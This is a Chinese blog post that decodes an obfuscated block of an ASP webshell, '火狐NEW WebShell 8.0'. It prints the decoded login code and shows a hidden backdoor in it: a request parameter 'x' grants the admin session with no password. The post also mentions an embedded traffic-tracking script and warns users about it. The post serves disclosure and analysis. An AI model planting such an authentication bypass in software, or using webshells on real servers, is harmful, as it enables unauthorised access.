最新公告
  • 欢迎您光临觅盒网,本站秉承服务宗旨 履行“站长”责任,销售只是起点 服务永无止境!立即加入我们
  • 解密《火狐NEW WebShell 8.0》后门代码

    用解密软件可以很容易的把《火狐NEW WebShell 8.0》中99%的代码解密出来,但其中还是有一段代码是加密的琳ZWpcVbfVdexriry.rirpeYV_琳pDVddZ`_xrhVS#R#U^Z_ryp.pFdVcARdd琳pppppppFC=xy琳ppV_UpZW琳琳:WpDVddZ`_xrhVS#R#U^Z_ryp-/pFdVcARddpEYV_琳pp:WpCVbfVde~7`c^xrARddryp-/prrpEYV_琳pppp:WpCVbfVde~7`c^xrARddryp.pFdVcARddpEYV_琳ppppppDVddZ`_xrhVS#R#U^Z_ryp.pFdVcARdd琳ppppppCVda`_dV~CVUZcVTepFC=琳pppp6]dV琳 pcVda`_dV~hcZeVrp验证p失败p!r琳pppp6_Up:W琳pp琳pp6]dV琳ppppD:.r-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/p-Sc/p火狐?6HpHVSDYV]]p)~!p-Sc/p-Sc/r琳ppppD:.D:vr-W`c^pRTeZ`_.wrvFC=vrwp^VeY`U.wa`dew/r琳ppppD:.D:vrp密码:-Z_afep_R^V.wARddwpejaV.waRddh`cUwpdZkV.w""&w/r琳ppppD:.D:vrpv_Sda,p-Z_afepejaV.wdfS^ZewpgR]fV.w登录w/p- W`c^/p- TV_eVc/r琳pppppCVda`_dV~HcZeVpD:琳pppppCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/每一天睜開眼睛ヽo妳和陽光都在→那就是ωǒ要的菋來-Sc/r琳 pCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/本人到此只是技术上的研究。鄙视搞破坏的-Sc/r琳 pCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/ -Sc/r琳pppppCVda`_dV~HcZeVr-TV_eVcpdej]V.wW`_e}dZkV+""#aiw/-Sc/3J+神魂颠倒じ☆-Sc/r琳pppppcVda`_dV~hcZeVr-daR_pdej]V.UZda]Rj+_`_V/-dTcZaep]R_XfRXV.rr[RgRdTcZaerrpdcT.rrYeea+ T`f_e#%~&""jVd~T`^ T]ZT\~Rdai0ZU.#%$((*&$'v]`X`.""rr/- dTcZae/- dTcZae/- daR_/r琳pp6_Up:W琳ppCVda`_dV~6_U琳6_Up:W琳
    不过只要你稍懂些Asp分析下它附近已解密出来的代码,要把上面这段代码也解密出来其实也很简单。解密后[code]if request(“x”)=”x” then
    Session(“web2a2dmin”) = UserPass
    URL()
    end if
    If Session(“web2a2dmin”) <> UserPass Then
    If Request.Form(“Pass”) <> “” Then
    If Request.Form(“Pass”) = UserPass Then
    Session(“web2a2dmin”) = UserPass
    Response.Redirect URL
    Else
    response.write” 验证 失败 !”
    End If
    Else
    SI=”

    火狐NEW WebShell 8.0


    SI=SI&”


    SI=SI&” 密码:
    SI=SI&”


    Response.Write SI
    Response.Write”

    每一天睜開眼睛ヽ~妳和陽光都在→那就是ωǒ要的菋來

    Response.Write”

    本人到此只是技术上的研究。鄙视搞破坏的

    Response.Write”

     

    Response.Write”

    BY:神魂颠倒じ☆

    response.write”
    End If
    Response.End
    End If[/code]
    看到了吧,代码里面隐藏着一个后门[code]if request(“x”)=”x” then
    Session(“web2a2dmin”) = UserPass
    URL()
    end if[/code]和一个流量统计代码,加这些代码的人还真不厚道,目前网上流传的版本中很多都有这个后门,使用《火狐NEW WebShell 8.0》的可要小心了。

    本站使用「署名 4.0 国际」创作协议,可自由转载、引用,但需署名原版权作者且注明文章出处。

    免责声明:
    1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长,并提供相应的资质证明,我们将于3个工作日内予以删除!
    2. 本站不保证所提供下载的资源的准确性、安全性和完整性,资源仅供下载学习之用!如果喜欢,请你购买正版,享受售后服务!
    3. 您必须在下载后的24个小时之内,从您的电脑中彻底删除上述内容资源!如用于商业或者非法用途,与本站无关,一切后果请用户自负!
    4. 如有链接无法下载、失效或广告,请联系客服处理,有奖励!
    5. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需!


    我的盒子|觅盒 » 解密《火狐NEW WebShell 8.0》后门代码

    常见问题FAQ

    免费下载或者VIP会员专享资源能否直接商用?
    本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
    提示下载完但解压或打开不了?
    最常见的情况是下载不完整: 可对比下载完压缩包的与网盘上的容量,若小于网盘提示的容量则是这个原因。这是浏览器下载的bug,建议用百度网盘软件或迅雷下载。若排除这种情况,可在对应资源底部留言,或 联络我们.。
    找不到素材资源介绍文章里的示例图片?
    对于PPT,KEY,Mockups,APP,网页模版等类型的素材,文章内用于介绍的图片通常并不包含在对应可供下载素材包内。这些相关商业图片需另外购买,且本站不负责(也没有办法)找到出处。 同样地一些字体文件也是这种情况,但部分素材会在素材包内有一份字体下载链接清单。
    联系站长
    yifeng@mebox.cn

    2 评论

    1. 头像

      这个后门难道web2a2dmin这个是万能密码么?
      不像啊 只是多了个流量统计??

    2. 头像

      呵呵 原来这个后门已经有人发现了

    发表评论

    此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

    • 243会员总数(位)
    • 838资源总数(个)
    • 1本周发布(个)
    • 0 今日发布(个)
    • 296稳定运行(天)

    提供最优质的资源集合

    立即查看 了解详情